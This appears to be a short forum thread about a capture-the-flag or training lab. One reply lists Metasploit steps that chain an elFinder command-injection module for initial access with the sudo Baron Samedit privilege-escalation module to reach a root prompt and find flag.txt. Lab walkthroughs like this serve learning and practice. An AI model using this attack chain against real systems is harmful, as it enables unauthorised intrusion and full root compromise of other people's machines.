Unable to get exploit to work in Meterpreter

Perfect. That worked for me. First I ran local_exploit_suggester which gave me a couple of options but none of them worked. I tried googling those exploits to find them on GitHub, but the exploits provided didn’t work out. Thanks!

To find the flag.txt, you need two meterpreter steps

  1. search elfinder → linux/http/elfinder_archive_cmd_injection
  2. exploit
  3. type “background” to put this exploit inito background
  4. you will be back to meterpreter
  5. use linux/local/sudo_baron_samedit
  6. Set the LHOST
  7. Obtain the session ID from (3) using “session” command
  8. set SESSION = session id from (7)
  9. exploit and you will get the root prompt
  10. find -f flag.txt